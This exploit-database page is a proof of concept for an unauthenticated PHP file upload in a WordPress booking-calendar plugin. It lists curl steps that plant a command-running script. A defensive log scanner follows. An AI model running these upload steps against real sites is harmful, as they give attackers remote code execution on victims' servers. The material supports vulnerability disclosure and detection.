## https://sploitus.com/exploit?id=WPEX-ID:4D91F3E1-4DE9-46C1-B5BA-CC55B7726867
1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:

```sh
echo '<?php passthru("id"); ?>' > /tmp/poc.php
```

4. Upload the payload with cURL, using the previously extracted nonce:

```sh
curl -i https://example.com/wp-admin/admin-ajax.php \
    -F 'action=wpdevart_form_ajax' \
    -F 'wpdevart_id=x' \
    -F 'wpdevart_nonce=<NONCE HERE>' \
    -F 'wpdevart_data={"wpdevart-submit":"X"}' \
    -F 'wpdevart-submit=1' \
    -F 'file=@/tmp/poc.php'
```

5. Access your payload; it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>":

```sh
curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php
```
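
A defender-side check for the request in step 5, as an added example that is not part of the original advisory: it scans web server access logs for requests to script files under the upload directory named above. It assumes the combined log format; the extension list, the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload directory named in step 5 of the page.
UPLOAD_DIR = "/wp-content/uploads/booking_calendar/"
# Assumption: extensions a typical PHP handler mapping may execute.
# The trailing (/|$) also catches PATH_INFO style requests such as x.php/foo.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(/|$)", re.IGNORECASE)
# Combined log format: ip - user [time] "METHOD target PROTO" status size ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def script_hits(lines):
    """Return requests for script files inside the plugin's upload directory."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the expected log format
        # Drop the query string and decode percent-encoding before matching.
        path = unquote(urlsplit(m["target"]).path)
        if path.lower().startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": path,
                "status": int(m["status"]),
                # A 200 means the file existed and the server answered for it.
                "served": m["status"] == "200",
            })
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 31 "-" "curl/8.4.0"',
    '198.51.100.7 - - [12/Mar/2024:10:01:05 +0000] "GET /wp-content/uploads/booking_calendar/poc.php HTTP/1.1" 200 54 "-" "curl/8.4.0"',
    '203.0.113.9 - - [12/Mar/2024:10:02:00 +0000] "GET /wp-content/uploads/booking_calendar/invoice.pdf HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [12/Mar/2024:10:03:00 +0000] "GET /wp-content/uploads/booking_calendar/a%2Ephp?x=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in script_hits(SAMPLE):
        print(hit)
```

Any hit with `served` set is worth triage, since an upload directory has no reason to contain script files; pairing the check with a web server rule that denies script execution under `wp-content/uploads/` removes the execution step entirely.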